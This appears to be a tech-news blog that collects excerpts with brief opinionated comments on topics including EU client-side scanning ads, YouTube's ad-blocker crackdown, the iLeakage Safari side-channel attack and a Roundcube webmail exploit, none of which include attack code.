EU Trys to Implement Client-Side Scanning, death to encryption By Personalised Targeting of EU Residents With Misleading Ads

The EU Commission has been pushing client-side scanning for well over a year. This new intrusion into private communications has been pitched as perhaps the only way to prevent the sharing of child sexual abuse material (CSAM).

Mandates proposed by the EU government would have forced communication services to engage in client-side scanning of content. This would apply to every communication or service provider. But it would only negatively affect providers incapable of snooping on private communications because their services are encrypted.

Encryption — especially end-to-end encryption — protects the privacy and security of users. The EU’s pitch said protecting more than the children was paramount, even if it meant sacrificing the privacy and security of millions of EU residents.

Encrypted services would have been unable to comply with the mandate without stripping the client-side end from their end-to-end encryption. So, while it may have been referred to with the legislative euphemism “chat control” by EU lawmakers, the reality of the situation was that this bill — if passed intact — basically would have outlawed E2EE.

Fortunately, there was a lot of pushback. Some of it came from service providers who informed the EU they would no longer offer their services in EU member countries if they were required to undermine the security they provided for their users.

The more unexpected resistance came from EU member countries who similarly saw the gaping security hole this law would create and wanted nothing to do with it. On top of that, the EU government’s own lawyers told the Commission passing this law would mean violating other laws passed by this same governing body.

This pushback was greeted by increasingly nonsensical assertions by the bill’s supporters. In op-eds and public statements, backers insisted everyone else was wrong and/or didn’t care enough about the well-being of children to subject every user of any communication service to additional government surveillance.

That’s what happened on the front end of this push to create a client-side scanning mandate. On the back end, however, the EU government was trying to dupe people into supporting their own surveillance with misleading ads that targeted people most likely to believe any sacrifice of their own was worth making when children were on the (proverbial) line.

That’s the unsettling news being delivered to us by Vas Panagiotopoulos for Wired. A security researcher based in Amsterdam took a long look at apparently misleading ads that began appearing on Twitter as the EU government amped up its push to outlaw encryption.

Danny Mekić was digging into the EU’s “chat control” law when he began seeing disturbing ads on Twitter. These ads featured young women being (apparently) menaced by sinister men, backed by a similarly dark background and soundtrack. The ads displayed some supposed “facts” about the sexual abuse of children and ended with the notice that the ads had been paid for by the EU Commission.

The ads also cited survey results that supposedly said most European citizens supported client-side scanning of content and communications, apparently willing to sacrifice their own privacy and security for the common good.

But Mekić dug deeper and discovered the cited survey wasn’t on the level.

Following closer inspection, he discovered that these findings appeared biased and otherwise flawed. The survey results were gathered by misleading the participants, he claims, which in turn may have misled the recipients of the ads; the conclusion that EU citizens were fine with greater surveillance couldn’t be drawn from the survey, and the findings clashed with those of independent polls.

This discovery prompted Mekić to dig even deeper. What Mekić found was that the ads were very tightly targeted — so tightly targeted, in fact, that they could not have been deployed in this manner without violating European laws that are aimed to prevent exactly this sort of targeting, i.e. by using “sensitive data” like religious beliefs and political affiliations.

The ads were extremely targeted, meant to find people most likely to be swayed towards the EU Commission’s side, either because the targets never appeared to distrust their respective governments or because their governments had yet to tell the EU Commission to drop its proposed anti-encryption proposal.

Mekić found that the ads were meant to be seen by select targets, such as top ministry officials, while they were concealed from people interested in Julian Assange, Brexit, EU corruption, Eurosceptic politicians (Marine Le Pen, Nigel Farage, Viktor Orban, Giorgia Meloni), the German right-wing populist party AfD, and “anti-Christians.”

Mekić then found out that the ads, which have garnered at least 4 million views, were only displayed in seven EU countries: the Netherlands, Sweden, Belgium, Finland, Slovenia, Portugal, and the Czech Republic.

A document leaked earlier this year exposed which EU members were in favor of client-side scanning and its attendant encryption backdoors, as well as those who thought the proposed mandate was completely untenable.

The countries targeted by the EU Commission ad campaign are, for the most part, supportive of/indifferent to broken encryption, client-side scanning, and expanded surveillance powers. Slovenia (along with Spain, Cyprus, Lithuania, Croatia, and Hungary) were all firmly in favor of bringing an end to end-to-end encryption.

[…]

While we’re accustomed to politicians airing misleading ads during election runs, this is something different. This is the representative government of several nations deliberately targeting countries and residents it apparently thinks might be receptive to its skewed version of the facts, which comes in the form of the presentation of misleading survey results against a backdrop of heavily-implied menace. And that’s on top of seeming violations of privacy laws regarding targeted ads that this same government body created and ratified.

It’s a tacit admission EU proposal backers think they can’t win this thing on its merits. And they can’t. The EU Commission has finally ditched its anti-encryption mandates after months of backlash. For the moment, E2EE survives in Europe. But it’s definitely still under fire. The next exploitable tragedy will bring with it calls to reinstate this part of the “chat control” proposal. It will never go away because far too many governments believe their citizens are obligated to let these governments shoulder-surf whenever they deem it necessary. And about the only thing standing between citizens and that unceasing government desire is end-to-end encryption.

Source: EU Pitched Client-Side Scanning By Targeting Certain EU Residents With Misleading Ads | Techdirt

As soon as you read that legislation is ‘for the kids’ be very very wary – as it’s usually for something completely beyond that remit. And this kind of legislation is the installation of Big Brother on every single communications line you use.

YouTube is cracking down on ad blockers globally. Time to go to the next video site. Vimeo, are you listening?

YouTube is no longer preventing just a small subset of its userbase from accessing its videos if they have an ad blocker. The platform has gone all out in its fight against the use of add-ons, extensions and programs that prevent it from serving ads to viewers around the world, it confirmed to Engadget. “The use of ad blockers violate YouTube’s Terms of Service,” a spokesperson told us. “We’ve launched a global effort to urge viewers with ad blockers enabled to allow ads on YouTube or try YouTube Premium for an ad free experience. Ads support a diverse ecosystem of creators globally and allow billions to access their favorite content on YouTube.”

YouTube started cracking down on the use of ad blockers earlier this year. It initially showed pop-ups to users telling them that it’s against the website’s TOS, and then it put a timer on those notifications to make sure people read it. By June, it took on a more aggressive approach and warned viewers that they wouldn’t be able to play more than three videos unless they disable their ad blockers. That was a “small experiment” meant to urge users to enable ads or to try YouTube Premium, which the website has now expanded to its entire userbase. Some people can’t even play videos on Microsoft Edge and Firefox browsers even if they don’t have ad blockers, according to Android Police, but we weren’t able to replicate that behavior. [Note –  I was!]

People are unsurprisingly unhappy about the development and have taken to social networks like Reddit to air their grievances. If they don’t want to enable ads, after all, the only way they can watch videos with no interruptions is to pay for a YouTube Premium subscription. Indeed, the notification viewers get heavily promotes the subscription service. “Ads allow YouTube to stay free for billions of users worldwide,” it says. But with YouTube Premium, viewers can go ad-free, and “creators can still get paid from [their] subscription.”

[…]

Source: YouTube is cracking down on ad blockers globally

It doesn’t help YouTube much that the method they have of detecting your ad blocker basically comes down to using spyware. Source: Privacy advocate challenges YouTube’s ad blocking detection (which isn’t spyware)

Mass lawsuit against Apple over throttled and broken iPhone batteries can go ahead, London tribunal rules

Apple Inc (AAPL.O) on Wednesday lost a bid to block a mass London lawsuit worth up to $2 billion which accuses the tech giant of hiding defective batteries in millions of iPhones.

The lawsuit was brought by British consumer champion Justin Gutmann on behalf of around 24 million iPhone users in the United Kingdom.

Gutmann is seeking damages from Apple on their behalf of up to 1.6 billion pounds ($1.9 billion) plus interest, with the claim’s midpoint range being 853 million pounds.

His lawyers argued Apple concealed issues with batteries in certain phone models by “throttling” them with software updates and installed a power management tool which limited performance.

Apple, however, said the lawsuit was “baseless” and strongly denied batteries in iPhones were defective, apart from in a small number of iPhone 6s models for which it offered free battery replacements.

[…]

Source: Mass lawsuit against Apple over iPhone batteries can go ahead, London tribunal rules | Reuters

Black 4.0 Is The New Ultrablack paint

Vantablack is a special coating material, moreso than a paint. It’s well-known as one of the blackest possible coatings around, capable of absorbing almost all visible light in its nanotube complex structure. However, it’s complicated to apply, delicate, and not readily available, especially to those in the art world.

It was these drawbacks that led Stuart Semple to create his own incredibly black paint. Over the years, he’s refined the formula and improved its performance, steadily building a greater product available to all. His latest effort is Black 4.0, and it’s promising to be the black paint to dominate all others.

 

Back in Black

This journey began in a wonderfully spiteful fashion. Upon hearing that one Anish Kapoor had secured exclusive rights to be the sole artistic user of Vantablack, he determined that something had to be done. Seven years ago, he set out to create his own ultra black paint that would far outperform conventional black paints on the market. Since his first release, he’s been delivering black paints that suck in more light and just simply look blacker than anything else out there.

Black 4.0 has upped the ante to a new level. Speaking to Hackaday, Semple explained the performance of the new paint, being sold through his Culture Hustle website. “Black 4.0 absorbs an astonishing 99.95% of visible light which is about as close to full light absorption as you’ll ever get in a paint,” said Semple. He notes this outperforms Vantablack’s S-Vis spray on product which only achieves 99.8%, as did his previous Black 3.0 paint. Those numbers are impressive, and we’d dearly love to see the new paint put to the test against other options in the ultra black market.

It might sound like mere fractional percentages, but it makes a difference. In sample tests, the new paint is more capable of fun visual effects since it absorbs yet more light. Under indoor lighting conditions, an item coated in Black 4.0 can appear to have no surface texture at all, looking to be a near-featureless black hole. Place an object covered in Black 4.0 on a surface coated in the same, and it virtually disappears. All the usual reflections and shadows that help us understand 3D geometry simply get sucked into the overwhelming blackness.

Black 4.0 compared to a typical black acrylic art paint. Credit: Stuart Semple

Beyond its greater light absorption, the paint has also seen a usability upgrade over Semple’s past releases. For many use cases, a single coat is all that’s needed. “It feels much nicer to use, it’s much more stable, more durable, and obviously much blacker,” he says, adding “The 3.0 would occasionally separate and on rare occasions collect little salt crystals at the surface, that’s all gone now.”

The added performance comes down to a new formulation of the paint’s “super-base” resin, which carries the pigment and mattifying compounds that give the paint its rich, dreamy darkness. It’s seen a few ingredient substitutions compared to previous versions, but a process change also went a long way to creating an improved product. “The interesting thing is that although all that helped, it was the process we used to make the paint that gave us the breakthrough, the order we add things, the way we mix them, and the temperature,” Semple told Hackaday.

The ultra black paint has a way of making geometry disappear. Credit: Stuart Semple

Black 4.0 is more robust than previous iterations, but it’s still probably not up to a full-time life out in the elements, says Semple. You could certainly coat a car in it, for example, but it probably wouldn’t hold up in the long term. He’s particularly excited for applications in astronomy and photography, where the extremely black paint can help catch light leaks and improve the performance of telescopes and cameras. It’s also perfect for creating an ultra black photographic backdrop, too.

No special application methods are required; Black 4.0 can be brush painted just like its predecessors. Indeed, it absorbs so much light that you probably don’t need to worry as much about brush marks as you usually would. Other methods, like using rollers or airbrushes, are perfectly fine, too.

Creating such a high-performance black paint didn’t come without challenges, either. Along the way, Semple contended with canisters of paint exploding, legal threats from others in the market, and one of the main scientists leaving the project. Wrangling supplies of weird and wonderful ingredients was understandably difficult, too.  Nonetheless, he persevered, and has now managed to bring the first batches to market.

The first batches ship in November, so if you’re eager to get some of the dark stuff, you’d better move quick. It doesn’t come cheap, but you’re always going to pay more for something claiming to be the world’s best. If you’ve got big plans, fear not—this time out, Semple will sell the paint in huge bulk 1 liter and 6 liter containers if you really need a job lot. Have fun out there, and if you do something radical, you know who to tell about it.

Source: Black 4.0 Is The New Ultrablack | Hackaday

Posted in Art

Researchers devise method using mirrors to monitor nuclear stockpiles offsite

Researchers say they have developed a method to remotely track the movement of objects in a room using mirrors and radio waves, in the hope it could one day help monitor nuclear weapons stockpiles.

According to the non-profit org International Campaign to Abolish Nuclear Weapons, nine countries, including Russia, the United States, China, France, the United Kingdom, Pakistan, India, Israel and North Korea collectively own about 12,700 nuclear warheads.

Meanwhile, over 100 nations have signed the United Nations’ Treaty on the Prohibition of Nuclear Weapons, promising to not “develop, test, produce, acquire, possess, stockpile, use or threaten to use” the tools of mass destruction. Tracking signs of secret nuclear weapons development, or changes in existing warhead caches, can help governments identify entities breaking the rules.

A new technique devised by a team of researchers led by the Max Planck Institute for Security and Privacy (MPI-SP) aims to remotely monitor the removal of warheads stored in military bunkers. The scientists installed 20 adjustable mirrors and two antennae to monitor the movement of a blue barrel stored in a shipping container. One antenna emits radio waves that bounce off each mirror to create a unique reflection pattern detected by the other antenna.

The signals provide information on the location of objects in the room. Moving the objects or mirrors will produce a different reflection pattern. Experiments showed that the system was sensitive enough to detect whether the blue barrel had shifted by just a few millimetres. Now, the team reckons that it could be applied to monitor whether nuclear warheads have been removed from stockpiles.

At this point, readers may wonder why this tech is proposed for the job when CCTV, or Wi-Fi location, or any number of other observation techniques could do the same job.

The paper explains that the antenna-and-mirror technique doesn’t require secure communication channels or tamper-resistant sensor hardware. The paper’s authors argue it is also “robust against major physical and computational attacks.”

“Seventy percent of the world’s nuclear weapons are kept in storage for military reserve or awaiting dismantlement,” Sebastien Philippe, co-author of a research paper published in Nature Communications. Philippe is an associate research scholar at the School of Public and International Affairs at Princeton University, explained.

“The presence and number of such weapons at any given site cannot be verified easily via satellite imagery or other means that are unable to see into the storage vaults. Because of the difficulties to monitor them, these 9,000 nuclear weapons are not accounted for under existing nuclear arms control agreements. This new verification technology addresses this long-standing challenge and contributes to future diplomatic efforts that would seek to limit all nuclear weapon types,” he said in a statement.

In practice, officials from and organisation such as UN-led International Atomic Energy Agency, which promotes peaceful uses of nuclear energy, could install the system in a nuclear bunker and measure the radio waves reflecting off its mirrors. The unique fingerprint signal can then be stored in a database.

They could later ask the government controlling the nuclear stockpile to measure the radio wave signal recorded by its detector antenna and compare it to the initial result to check whether any warheads have been moved.

If both measurements are the same, the nuclear weapon stockpile has not been tampered with. But if they’re different, it shows something is afoot. The method is only effective if the initial radio fingerprint detailing the original configuration of the warheads is kept secret, however.

Unfortunately, it’s not quite foolproof, considering adversaries could technically use machine learning algorithms to predict how the positions of the mirrors generate the corresponding radio wave signal detected by the antenna.

“With 20 mirrors, it would take eight weeks for an attacker to decode the underlying mathematical function,” said Johannes Tobisch, co-author of the study and a researcher at the MPI-SP. “Because of the scalability of the system, it’s possible to increase the security factor even more.”

To prevent this, the researchers said that the verifier and prover should agree to send back a radio wave measurement within a short time frame, such as within a minute or so. “Beyond nuclear arms control verification, our inspection system could find application in the financial, information technology, energy, and art sectors,” they concluded in their paper.

“The ability to remotely and securely monitor activities and assets is likely to become more important in a world that is increasingly networked and where physical travel and on-site access may be unnecessary or even discouraged.”

Source: Researchers devise new method to monitor nuclear stockpiles • The Register

Judge dismisses most of artists’ AI copyright lawsuits against Midjourney, Stability AI

judge in California federal court on Monday trimmed a lawsuit by visual artists who accuse Stability AI, Midjourney and DeviantArt of misusing their copyrighted work in connection with the companies’ generative artificial intelligence systems.

U.S. District Judge William Orrick dismissed some claims from the proposed class action brought by Sarah Andersen, Kelly McKernan and Karla Ortiz, including all of the allegations against Midjourney and DeviantArt. The judge said the artists could file an amended complaint against the two companies, whose systems utilize Stability’s Stable Diffusion text-to-image technology.

Orrick also dismissed McKernan and Ortiz’s copyright infringement claims entirely. The judge allowed Andersen to continue pursuing her key claim that Stability’s alleged use of her work to train Stable Diffusion infringed her copyrights.

The same allegation is at the heart of other lawsuits brought by artists, authors and other copyright owners against generative AI companies.

“Even Stability recognizes that determination of the truth of these allegations – whether copying in violation of the Copyright Act occurred in the context of training Stable Diffusion or occurs when Stable Diffusion is run – cannot be resolved at this juncture,” Orrick said.

The artists’ attorneys Joseph Saveri and Matthew Butterick said in a statement that their “core claim” survived, and that they were confident that they could address the court’s concerns about their other claims in an amended complaint to be filed next month.

A spokesperson for Stability declined to comment on the decision. Representatives for Midjourney and DeviantArt did not immediately respond to requests for comment.

The artists said in their January complaint that Stability used billions of images “scraped” from the internet, including theirs, without permission to teach Stable Diffusion to create its own images.

Orrick agreed with all three companies that the images the systems actually created likely did not infringe the artists’ copyrights. He allowed the claims to be amended but said he was “not convinced” that allegations based on the systems’ output could survive without showing that the images were substantially similar to the artists’ work.

The judge also dismissed other claims from the artists, including that the companies violated their publicity rights and competed with them unfairly, with permission to refile.

Orrick dismissed McKernan and Ortiz’s copyright claims because they had not registered their images with the U.S. Copyright Office, a requirement for bringing a copyright lawsuit.

The case is Andersen v. Stability AI Ltd, U.S. District Court for the Northern District of California, No. 3:23-cv-00201.

For the artists: Joseph Saveri of Joseph Saveri Law Firm; and Matthew Butterick

For Stability: Paul Schoenhard of Fried Frank Harris Shriver & Jacobson

For Midjourney: Angela Dunning of Cleary Gottlieb Steen & Hamilton

For DeviantArt: Andy Gass of Latham & Watkins

Read more:

Lawsuits accuse AI content creators of misusing copyrighted work

AI companies ask U.S. court to dismiss artists’ copyright lawsuit

US judge finds flaws in artists’ lawsuit against AI companies

Source: Judge pares down artists’ AI copyright lawsuit against Midjourney, Stability AI | Reuters

These suits are absolute nonsense. It’s like suing a person for having seen some art and made something a bit like it. It’s not very surprising that this has been wiped off the table.

Drugmakers Are Set To Pay 23andMe Millions To Access Your DNA – which is also your families DNA

GSK will pay 23andMe $20 million for access to the genetic-testing company’s vast trove of consumer DNA data, extending a five-year collaboration that’s allowed the drugmaker to mine genetic data as it researches new medications.

Under the new agreement, 23andMe will provide GSK with one year of access to anonymized DNA data from the approximately 80% of gene-testing customers who have agreed to share their information for research, 23andMe said in a statement Monday. The genetic-testing company will also provide data-analysis services to GSK.

23andMe is best known for its DNA-testing kits that give customers ancestry and health information. But the DNA it collects is also valuable, including for scientific research. With information from more than 14 million customers, the only data sets that rival the size of the 23andMe library belong to Ancestry.com and the Chinese government. The idea for drugmakers is to comb the data for hints about genetic pathways that might be at the root of disease, which could significantly speed up the long, slow process of drug development. GSK and 23andMe have already taken one potential medication to clinical trials: a cancer drug that works to block CD96, a protein that helps modulate the body’s immune responses. It entered that testing phase in four years, compared to an industry average of about seven years. Overall, the partnership between GSK and 23andMe has produced more than 50 new drug targets, according to the statement.

The new agreement changes some components of the collaboration. Any discoveries GSK makes with the 23andMe data will now be solely owned by the British pharmaceutical giant, while the genetic-testing company will be eligible for royalties on some projects. In the past, the two companies pursued new drug targets jointly. GSK’s new deal with 23andMe is also non-exclusive, leaving the genetic-testing company free to license its database to other drugmakers.

Source: Drugmakers Are Set To Pay 23andMe Millions To Access Consumer DNA – Slashdot

So – you paid for a DNA test and it turns out you didn’t think of the privacy aspect at all. Neither did you think up that you gave up your families DNA. Or that you can’t actually change your DNA either. Well done. It’s being spread all over the place. And no, the data is not anonymous – DNA is the most personal information you can give up ever.

Particle Accelerator can now be built on a Chip

Particle accelerators range in size from a room to a city. However, now scientists are looking closer at chip-sized electron accelerators, a new study finds. Potential near-term applications for the technology include radiation therapy for zapping skin cancer and, longer-term, new kinds of laser and light sources.

Particle accelerators generally propel particles within metal tubes or rings. The rate at which they can accelerate particles is limited by the peak fields the metallic surfaces can withstand. Conventional accelerators range in size from a few meters for medical applications to kilometers for fundamental research. The fields they use are often on the scale of millions of volts per meter.

In contrast, electrically insulating dielectric materials (stuff that doesn’t conduct electricity well but does support electrostatic fields well) can withstand light fields thousands of times stronger. This has led scientists to investigate creating dielectric accelerators that rely on lasers to hurl particles.

[…]

physicists fabricated a tiny channel 225 nanometers wide and up to 0.5 millimeters long. An electron beam entered one end of the channel and exited the other end.

The researchers shone infrared laser pulses 250 femtoseconds long on top of the channel to help accelerate electrons down it. Inside the channel, two rows of up to 733 silicon pillars, each 2 micrometers high, interacted with these laser pulses to generate accelerating forces.

The electrons entered the accelerators with an energy of 28,400 electron-volts, traveling at roughly one-third the speed of light. They exited it with an energy of 40,700 electron-volts, a 43 percent boost in energy.

This new type of particle accelerator can be built using standard cleanroom techniques, such as electron beam lithography. “This is why we think that our results represent a big step forward,” Hommelhoff says. “Everyone can go ahead and start engineering useful machines from this.”

[…]

Applications for these nanophotonic electron accelerators depend on the energies they can reach. Electrons of up to about 300,000 electron-volts are typical for electron microscopy, Hommelhoff says. For treatment of skin cancer, 10 million electron-volt electrons are needed. Whereas such medical applications currently require an accelerator 1 meter wide, as well as additional large, heavy and expensive parts to help drive the accelerator, “we could in principle get rid of both and have just a roughly 1-centimeter chip with a few extra centimeters for the electron source,” adds study lead author Tomáš Chlouba, a physicist at the University of Erlangen-Nuremberg in Germany.

Applications such as synchrotron light sources, free electron lasers, and searches for lightweight dark matter appear with billion electron-volt electrons. With trillion electron-volt electrons, high-energy colliders become possible, Hommelhoff says.

The scientists note there are many ways to improve their device beyond their initial proof-of-concept structures. They now aim to experiment with greater acceleration and higher electron currents to help enable applications, as well as boosting output by fabricating many accelerator channels next to each other that can all be driven by the same laser pulses.

In addition, although the new study experimented with structures made from silicon due to the relative ease of working with it, “silicon is not really a high-damage threshold material,” Hommelhoff says. Structures made of glass or other materials may allow much stronger laser pulses and thus more powerful acceleration, he says.

The researchers are interested in building a small-scale accelerator, “maybe with skin cancer treatment applications in mind first,” Hommelhoff says. “This is certainly something that we should soon transfer to a startup company.”

The scientists detailed their findings in the 19 October issue of the journal Nature.

Source: Particle Accelerator on a Chip Hits Penny-Size – IEEE Spectrum

Google CEO Defends Paying $26b in 2021 to Remain Top Search Engine

Google CEO Sundar Pichai upheld the company’s decision to pay out billions of dollars to remain the top global search engine at the U.S. anti-trust trial on Monday, according to a report from The Wall Street Journal. Pichai claimed he tried to give users a “seamless and easy” experience, even if it meant paying Apple and other tech companies an exorbitant fee.

The U.S. Department of Justice is arguing that Google created the building blocks to hold a monopoly over the market, but Pichai disagrees, saying the company is the dominant search engine because it is better than its competitors.

“We realized early on that browsers are critical to how people are able to navigate and use the web,” Pichai said during questioning, as reported by The Journal. “It became very clear early on that if you make the user’s experience better, they would use the web more, they would enjoy using the web more, and they would search more in Google as well.”

Pichai testified that Google’s payments to phone companies and manufacturers were meant to push them toward more security upgrades and not just enabling Google to be the primary search engine.

Internal emails between Pichai and his colleagues in 2007 were shared during the cross-examination revealing Google’s insistence to be Apple’s default search engine. Pichai says he was worried about being the only search engine and requested a Yahoo backup version.

Google paid Apple a reported $18 billion to remain the default search engine on its Macs, iPhones, and iPads in 2021, and paid tech companies a grand total of $26 billion in 2021 alone, according to court documents.

[…]

Source: Google CEO Defends Paying Billions to Remain Top Search Engine

Apple says BMW wireless chargers really are messing with iPhone 15s

Users have been reporting that their iPhone 15’s NFC chips were failing after using BMW’s in-car wireless charging, but until now, Apple hasn’t addressed the complaints. That seems to have changed as MacRumors reported this week that an Apple internal memo to third-party repair providers says a software update later this year should prevent a “small number” of in-car wireless chargers from “temporarily” disabling iPhone 15 NFC chips.

Apple reportedly says that until the fix comes out, anyone who experiences this should not use the wireless charger in their car. Users have been complaining about BMW wireless chargers breaking Apple Pay and the BMW digital key feature in posts on Reddit, Apple’s Support community, and MacRumors’ own forums.

BMW seemed to acknowledge the issue early this month when the BMW UK X account replied to a complaint earlier this month saying the company is working with Apple to investigate the issue. There’s no easy way to know which models are affected, so for now, if you have a BMW or a Toyota Supra with a wireless charger, it’s probably best to just avoid using it until the problem is fixed.

Source: Apple says BMW wireless chargers really are messing with iPhone 15s – The Verge

IoT standard Matter 1.2 released

[…] Matter, version 1.2, is now available for device makers and platforms to build into their products. It is packed with nine new device types, revisions, and additions to existing categories, core improvements to the specification and SDK, and certification and testing tools. The Matter 1.2 certification program is now open and members expect to bring these enhancements and new device types to market later this year and into 2024 and beyond.

[…]

The new device types supported in Matter 1.2 include:

  1. Refrigerators – Beyond basic temperature control and monitoring, this device type is also applicable to other related devices like deep freezers and even wine and kimchi fridges.
  2. Room Air Conditioners – While HVAC and thermostats were already part of Matter 1.0, stand alone Room Air Conditioners with temperature and fan mode control are now supported.
  3. Dishwashers – Basic functionality is included, like remote start and progress notifications. Dishwasher alarms are also supported, covering operational errors such as water supply and drain, temperature, and door lock errors.
  4. Laundry Washers – Progress notifications, such as cycle completion, can be sent via Matter. Dryers will be supported in a future Matter release.
  5. Robotic Vacuums – Beyond the basic features like remote start and progress notifications, there is support for key features like cleaning modes (dry vacuum vs wet mopping) and additional status details (brush status, error reporting, charging status).
  6. Smoke & Carbon Monoxide Alarms – These alarms will support notifications and audio and visual alarm signaling. Additionally, there is support for alerts about battery status and end-of-life notifications. These alarms also support self-testing. Carbon monoxide alarms support concentration sensing, as an additional data point.
  7. Air Quality Sensors –  Supported sensors can capture and report on: PM1, PM 2.5, PM 10, CO2, NO2, VOC, CO, Ozone, Radon, and Formaldehyde. Furthermore, the addition of the Air Quality Cluster enables Matter devices to provide AQI information based on the device’s location.
  8. Air Purifiers – Purifiers utilize the Air Quality Sensor device type to provide sensing information and also include functionality from other device types like Fans (required) and Thermostats (optional). Air purifiers also include consumable resource monitoring, enabling notifications on filter status (both HEPA and activated carbon filters are supported in 1.2).
  9. Fans –Matter 1.2 includes support for fans as a separate, certifiable device type. Fans now support movements like rock/oscillation and new modes like natural wind and sleep wind. Additional enhancements include the ability to change the airflow direction (forward and reverse) and step commands to change the speed of airflow. […]

Core improvements to the Matter 1.2 specification include:

  • Latch & Bolt Door Locks – Enhancements for European markets that capture the common configuration of a combined latch and bolt lock unit.
  • Device Appearance – Added description of device appearance, so that devices can describe their color and finish. This will enable helpful representations of devices across clients.
  • Device & Endpoint Composition – Devices can now be hierarchically composed from complex endpoints allowing for accurate modeling of appliances, multi-unit switches, and multi-light fixtures.
  • Semantic Tags – Provide an interoperable way to describe the location and semantic functions of generic Matter clusters and endpoints to enable consistent rendering and application across the different clients. For example, semantic tags can be used to represent the location and function of each button on a multi-button remote control.
  • Generic Descriptions of Device Operational States – Expressing the different operational modes of a device in a generic way will make it easier to generate new device types in future revisions of Matter and ensure their basic support across various clients.
Under-the-Hood Enhancements: Matter SDK & Test Harness

Matter 1.2 brings important enhancements in the testing and certification program which helps companies bring products – hardware, software, chipsets and apps – to market faster. These improvements will benefit the wider developer community and ecosystem around Matter.

  • New Platform Support in SDK – Matter 1.2 SDK is now available for new platforms providing more ways for developers to build new products for Matter.
  • Enhancements to the Matter Test Harness – The Test Harness is a critical piece for ensuring the specification and its features are being implemented correctly. The Test Harness is now available via open source, making it easier for Matter developers to contribute to the tools (to make them better), and to ensure they are working with the latest version (with all features and bug fixes.

[…]

Developers interested in learning more about these enhancements can access the following resources:

[…]

Source: Matter 1.2 Arrives with Nine New Device Types & – CSA-IOT

iLeakage hack can force iOS and macOS browsers to divulge passwords and much more

Researchers have devised an attack that forces Apple’s Safari browser to divulge passwords, Gmail message content, and other secrets by exploiting a side channel vulnerability in the A- and M-series CPUs running modern iOS and macOS devices.

 

iLeakage, as the academic researchers have named the attack, is practical and requires minimal resources to carry out. It does, however, require extensive reverse-engineering of Apple hardware and significant expertise in exploiting a class of vulnerability known as a side channel, which leaks secrets based on clues left in electromagnetic emanations, data caches, or other manifestations of a targeted system. The side channel in this case is speculative execution, a performance enhancement feature found in modern CPUs that has formed the basis of a wide corpus of attacks in recent years. The nearly endless stream of exploit variants has left chip makers—primarily Intel and, to a lesser extent, AMD—scrambling to devise mitigations.

Exploiting WebKit on Apple silicon

The researchers implement iLeakage as a website. When visited by a vulnerable macOS or iOS device, the website uses JavaScript to surreptitiously open a separate website of the attacker’s choice and recover site content rendered in a pop-up window. The researchers have successfully leveraged iLeakage to recover YouTube viewing history, the content of a Gmail inbox—when a target is logged in—and a password as it’s being autofilled by a credential manager. Once visited, the iLeakage site requires about five minutes to profile the target machine and, on average, roughly another 30 seconds to extract a 512-bit secret, such as a 64-character string.

Top: An email displayed in Gmail’s web view. Bottom: Recovered sender address, subject, and content.
Enlarge / Top: An email displayed in Gmail’s web view. Bottom: Recovered sender address, subject, and content.
Kim, et al.

“We show how an attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution,” the researchers wrote on an informational website. “In particular, we demonstrate how Safari allows a malicious webpage to recover secrets from popular high-value targets, such as Gmail inbox content. Finally, we demonstrate the recovery of passwords, in case these are autofilled by credential managers.”

[…]

For the attack to work, a vulnerable computer must first visit the iLeakage website. For attacks involving YouTube, Gmail, or any other specific Web property, a user should be logged into their account at the same time the attack site is open. And as noted earlier, the attacker website needs to spend about five minutes probing the visiting device. Then, using the window.open JavaScript method, iLeakage can cause the browser to open any other site and begin siphoning certain data at anywhere from 24 to 34 bits per second.

[…]

iLeakage is a practical attack that requires only minimal physical resources to carry out. The biggest challenge—and it’s considerable—is the high caliber of technical expertise required. An attacker needs to not only have years of experience exploiting speculative execution vulnerabilities in general but also have fully reverse-engineered A- and M-series chips to gain insights into the side channel they contain. There’s no indication that this vulnerability has ever been discovered before, let alone actively exploited in the wild.

That means the chances of this vulnerability being used in real-world attacks anytime soon are slim, if not next to zero. It’s likely that Apple’s scheduled fix will be in place long before an iLeakage-style attack site does become viable.

Source: Hackers can force iOS and macOS browsers to divulge passwords and much more | Ars Technica

Hackers Target European Government With Roundcube Webmail Bug

Winter Vivern, believed to be a Belarus-aligned hacker, attacked European government entities and a think tank starting on Oct. 11, according to an Ars Technica report Wednesday. ESET Research discovered the hack that exploited a zero-day vulnerability in Roundcube, a webmail server with millions of users, and allowed the pro-Russian group to exfiltrate sensitive emails.

Roundcube patched the XSS vulnerability on Oct. 14, two days after ESET Research reported it. Winter Vivern sent malicious code to users disguised in an innocent-looking email from team.management@outlook.com. Users simply viewed the message in a web browser, and the hacker could access all their emails. Winter Vivern is a cyberespionage group that has been active since at least 2020 targeting governments in Europe and Central Asia.

“Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns,” said Matthieu Faou, a malware researcher at ESET, in a post.

Roundcube released an update for multiple versions of its software on Oct. 16 fixing the cross-site scripting vulnerabilities. Despite the patch and known vulnerabilities in older versions, many applications don’t get updated by users, says Faou.

[…]

Source: Hackers Target European Government With Roundcube Webmail Bug

Privacy advocate challenges YouTube’s ad blocking detection (which isn’t spyware)

Last week, privacy advocate (and very occasional Reg columnist) Alexander Hanff filed a complaint with the Irish Data Protection Commission (DPC) decrying YouTube’s deployment of JavaScript code to detect the use of ad blocking extensions by website visitors.

On October 16, according to the Internet Archives’ Wayback Machine, Google published a support page declaring that “When you block YouTube ads, you violate YouTube’s Terms of Service.”

“If you use ad blockers,” it continues, “we’ll ask you to allow ads on YouTube or sign up for YouTube Premium. If you continue to use ad blockers, we may block your video playback.”

YouTube’s Terms of Service do not explicitly disallow ad blocking extensions, which remain legal in the US [PDF], in Germany, and elsewhere. But the language says users may not “circumvent, disable, fraudulently engage with, or otherwise interfere with any part of the Service” – which probably includes the ads.

Image of 'Ad blockers are not allowed' popup

Image of ‘Ad blockers are not allowed’ popup – Click to enlarge

YouTube’s open hostility to ad blockers coincides with the recent trial deployment of a popup notice presented to web users who visit the site with an ad-blocking extension in their browser – messaging tested on a limited audience at least as far back as May.

In order to present that popup YouTube needs to run a script, changed at least twice a day, to detect blocking efforts. And that script, Hanff believes, violates the EU’s ePrivacy Directive – because YouTube did not first ask for explicit consent to conduct such browser interrogation.

[…]

